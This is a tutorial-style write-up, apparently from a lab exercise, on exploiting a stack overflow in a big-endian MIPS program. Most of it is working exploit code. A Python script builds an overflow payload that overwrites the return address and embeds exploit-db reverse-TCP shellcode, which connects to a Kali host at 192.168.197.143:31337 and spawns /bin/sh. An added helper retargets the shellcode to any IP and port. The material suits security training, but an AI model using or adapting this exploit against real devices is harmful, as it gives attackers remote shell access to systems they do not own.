MIPS Reverse TCP Exploit Shellcode

First, as usual, debug the program to determine the offset and the SP value.

Set a breakpoint at the return of the main function.

Once execution reaches it, inspect the registers: the return address RA has been overwritten with BBBB, and SP at this point is 0x7FFFEE98.

So overwrite the BBBB (RA) value with the address of CCCC, which is where SP points: 0x7FFFEE98. Since the shellcode follows the RA slot in the payload, returning to SP lands on its first instruction.

Because this program is big-endian, use a Big Endian shellcode from exploit-db.

Reference: https://www.exploit-db.com/exploits/45541

By default this shellcode connects back to 192.168.2.157:31337.

Change the IP address to the Kali machine's address, 192.168.197.143; the port stays the same.

The modified code is as follows:

#!/usr/bin/env python3
# Build the overflow payload: padding up to the saved RA, the new RA (= SP),
# then the big-endian MIPS reverse-TCP shellcode from exploit-db 45541 with the
# connect-back address changed to 192.168.197.143:31337.

import struct

print('[*] prepare shellcode ', end='')

shellcode = b"A" * 0x19C                    # padding up to the saved RA (offset found in gdb)
shellcode += struct.pack(">L", 0x7FFFEE98)  # new RA: the SP value, where the bytes below land

# socket(AF_INET, SOCK_STREAM, 0)
shellcode += b"\x24\x0f\xff\xfa"      # li      $t7, -6
shellcode += b"\x01\xe0\x78\x27"      # nor     $t7, $t7, $zero    ( $t7 = 5 )
shellcode += b"\x21\xe4\xff\xfd"      # addi    $a0, $t7, -3       ( domain = 2, AF_INET )
shellcode += b"\x21\xe5\xff\xfd"      # addi    $a1, $t7, -3       ( type = 2, SOCK_STREAM )
shellcode += b"\x28\x06\xff\xff"      # slti    $a2, $zero, -1     ( protocol = 0 )
shellcode += b"\x24\x02\x10\x57"      # li      $v0, 4183 ( sys_socket )
shellcode += b"\x01\x01\x01\x0c"      # syscall 0x40404
shellcode += b"\xaf\xa2\xff\xff"      # sw      $v0, -1($sp)       ( save the socket fd )
shellcode += b"\x8f\xa4\xff\xff"      # lw      $a0, -1($sp)
# build struct sockaddr_in at -0x1e($sp)
shellcode += b"\x34\x0f\xff\xfd"      # ori     $t7, $zero, 0xfffd
shellcode += b"\x01\xe0\x78\x27"      # nor     $t7, $t7, $zero    ( $t7 = 0xffff0002 )
shellcode += b"\xaf\xaf\xff\xe0"      # sw      $t7, -0x20($sp)    ( sin_family = AF_INET lands at -0x1e )
# ================ You can change port here  =================
shellcode += b"\x3c\x0e\x7a\x69"      # lui     $t6, 0x7a69 ( sin_port = 0x7a69 == 31337 )
# ============================================================

shellcode += b"\x35\xce\x7a\x69"      # ori     $t6, $t6, 0x7a69
shellcode += b"\xaf\xae\xff\xe4"      # sw      $t6, -0x1c($sp)

# ================ You can change ip here  ===================
shellcode += b"\x3c\x0e\xc0\xa8"      # lui     $t6, 0xc0a8         ( sin_addr = 0xc0a8 == 192.168
shellcode += b"\x35\xce\xc5\x8f"      # ori     $t6, $t6, 0xc58f                 0xc58f == 197.143 )
# ============================================================

shellcode += b"\xaf\xae\xff\xe6"      # sw      $t6, -0x1a($sp)    ( unaligned store; relies on the kernel's unaligned-access fixup )
shellcode += b"\x27\xa5\xff\xe2"      # addiu   $a1, $sp, -0x1e    ( &sockaddr_in )
shellcode += b"\x24\x0c\xff\xef"      # li      $t4, -17  ( addrlen = 16 )
shellcode += b"\x01\x80\x30\x27"      # nor     $a2, $t4, $zero
shellcode += b"\x24\x02\x10\x4a"      # li      $v0, 4170 ( sys_connect )
shellcode += b"\x01\x01\x01\x0c"      # syscall 0x40404
# dup2(sockfd, 2), dup2(sockfd, 1), dup2(sockfd, 0)
shellcode += b"\x24\x0f\xff\xfd"      # li      $t7, -3
shellcode += b"\x01\xe0\x28\x27"      # nor     $a1, $t7, $zero    ( $a1 = 2 )
shellcode += b"\x8f\xa4\xff\xff"      # lw      $a0, -1($sp)       ( sockfd )
# dup2_loop:
shellcode += b"\x24\x02\x0f\xdf"      # li      $v0, 4063 ( sys_dup2 )
shellcode += b"\x01\x01\x01\x0c"      # syscall 0x40404
shellcode += b"\x24\xa5\xff\xff"      # addiu   $a1, $a1, -1 (addi would be \x20\xa5\xff\xff)
shellcode += b"\x24\x01\xff\xff"      # li      $at, -1
shellcode += b"\x14\xa1\xff\xfb"      # bne     $a1, $at, dup2_loop
# execve("//bin/sh", ["//bin/sh", NULL], NULL)
shellcode += b"\x28\x06\xff\xff"      # slti    $a2, $zero, -1     ( envp = NULL; also fills the branch delay slot )
shellcode += b"\x3c\x0f\x2f\x2f"      # lui     $t7, 0x2f2f         ( "//" )
shellcode += b"\x35\xef\x62\x69"      # ori     $t7, $t7, 0x6269    ( "bi" )
shellcode += b"\xaf\xaf\xff\xec"      # sw      $t7, -0x14($sp)
shellcode += b"\x3c\x0e\x6e\x2f"      # lui     $t6, 0x6e2f         ( "n/" )
shellcode += b"\x35\xce\x73\x68"      # ori     $t6, $t6, 0x7368    ( "sh" )
shellcode += b"\xaf\xae\xff\xf0"      # sw      $t6, -0x10($sp)
shellcode += b"\xaf\xa0\xff\xf4"      # sw      $zero, -0xc($sp)    ( NUL terminator )
shellcode += b"\x27\xa4\xff\xec"      # addiu   $a0, $sp, -0x14     ( path )
shellcode += b"\xaf\xa4\xff\xf8"      # sw      $a0, -8($sp)        ( argv[0] )
shellcode += b"\xaf\xa0\xff\xfc"      # sw      $zero, -4($sp)      ( argv[1] = NULL )
shellcode += b"\x27\xa5\xff\xf8"      # addiu   $a1, $sp, -8        ( argv )
shellcode += b"\x24\x02\x0f\xab"      # li      $v0, 4011 ( sys_execve )
shellcode += b"\x01\x01\x01\x0c"      # syscall 0x40404

print(' ok')

print('[+] create passwd file ', end='')
with open('passwd', 'wb') as fw:
    fw.write(shellcode)
print(' ok')
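The "change port here" and "change ip here" slots above are hand-assembled lui/ori pairs, which is easy to get wrong when retargeting the shellcode. The following is an added example, not part of the original post or the exploit-db shellcode: it encodes those four MIPS instruction words for any IPv4 address and port, flags NUL bytes that a string-based copy in the target would truncate on, and replays the shellcode's three sw stores to show the struct sockaddr_in that sys_connect actually receives. The register ($t6) and the -0x20/-0x1c/-0x1a($sp) store offsets are taken from the shellcode above; the sample targets are constructed.

```python
import socket
import struct

# Added example (not from the original post or the exploit-db shellcode).
# Register and stack offsets mirror the shellcode shown on this page.
OP_ORI = 0x0D   # opcode 001101
OP_LUI = 0x0F   # opcode 001111
T6 = 14         # $t6, the register the shellcode loads the port and address into


def encode_itype(opcode, rs, rt, imm16):
    """MIPS32 I-type word, big-endian: opcode[31:26] rs[25:21] rt[20:16] imm[15:0]."""
    word = (opcode << 26) | (rs << 21) | (rt << 16) | (imm16 & 0xFFFF)
    return struct.pack(">I", word)


def li32(reg, value):
    """lui reg, hi16 ; ori reg, reg, lo16 -- the two-instruction 32-bit load
    the shellcode uses for sin_port and sin_addr (no NUL bytes unless the value has them)."""
    value &= 0xFFFFFFFF
    return (encode_itype(OP_LUI, 0, reg, value >> 16)
            + encode_itype(OP_ORI, reg, reg, value & 0xFFFF))


def connect_back_words(ip, port):
    """Instruction bytes for the 'change port here' / 'change ip here' slots.
    The shellcode stores the port word at -0x1c($sp) and then overlaps its upper
    half with the address word at -0x1a($sp), so the port is duplicated in both halves."""
    if not 0 < port < 0x10000:
        raise ValueError("port out of range")
    port_words = li32(T6, (port << 16) | port)
    ip_words = li32(T6, struct.unpack(">I", socket.inet_aton(ip))[0])
    return port_words, ip_words


def nul_offsets(blob):
    """Offsets of 0x00 bytes; a str*-style copy in the target would stop there."""
    return [i for i, b in enumerate(blob) if b == 0]


def sockaddr_as_seen_by_connect(ip, port):
    """Replay the shellcode's stack stores and decode the 16 bytes that
    `addiu $a1, $sp, -0x1e` hands to sys_connect."""
    mem = bytearray(0x20)                    # models $sp-0x20 .. $sp-1

    def sw(off, word):                       # sw reg, off($sp)
        mem[off + 0x20:off + 0x24] = struct.pack(">I", word)

    sw(-0x20, ~0x0000FFFD & 0xFFFFFFFF)      # ori $t7,$zero,0xfffd ; nor -> 0xffff0002
    sw(-0x1c, (port << 16) | port)           # sin_port, twice
    sw(-0x1a, struct.unpack(">I", socket.inet_aton(ip))[0])  # sin_addr (unaligned)
    sa = bytes(mem[0x20 - 0x1e:0x20 - 0x1e + 16])
    family, sin_port, sin_addr = struct.unpack(">HH4s8x", sa)
    return {"family": family, "port": sin_port, "ip": socket.inet_ntoa(sin_addr)}


if __name__ == "__main__":
    pw, iw = connect_back_words("192.168.197.143", 31337)
    print(pw.hex(), iw.hex())                # matches the four words in the shellcode above
    print(sockaddr_as_seen_by_connect("192.168.197.143", 31337))
    # constructed target with NUL bytes in both the port and the address
    print(nul_offsets(b"".join(connect_back_words("10.0.0.1", 80))))
```

Splice the two returned byte strings over the lui/ori pairs in the marked slots; if nul_offsets reports anything, the target's copy routine decides whether that matters (the page's payload is written to a file, so it is only a concern when the vulnerable path is a string copy).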

Run this Python script, start a port listener on the Kali side, then call the vuln_system function. An error message is printed and the program stops there, which shows that the reverse connection has been made.

On the Kali listener there is no prompt echoed back, but commands can already be executed.
